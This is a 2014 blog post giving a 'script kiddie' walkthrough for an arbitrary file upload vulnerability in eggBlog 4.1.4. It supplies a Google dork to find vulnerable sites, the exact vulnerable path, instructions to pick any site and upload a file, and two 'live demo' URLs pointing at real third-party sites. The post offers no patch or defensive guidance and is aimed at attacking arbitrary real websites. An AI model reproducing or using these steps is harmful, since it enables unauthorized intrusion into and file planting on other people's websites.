Home Unlabelled Exploit eggBlog 414 Arbitrary File Upload

Exploit eggBlog 414 Arbitrary File Upload

By
Wednesday, February 12, 2014
Read
Add Comment


Finding Vulnerable Target

Dork: "powered by eggBlog.net"

Exploit : /_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

1- Copy the dork and paste on Google

2- Choose any site

Exploiting Target

1- Paste the exploit at the end of the URL.

Example:

www.site.com/index.php?id=12

become

www.site.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

and you will see something like this


2- Choose your file and click Upload.

3- To view your file, simply click on your file name in the upper right box.

Live Demo:

http://www.cn-blue.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

http://www.mrcromwellsattic.com/blog/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us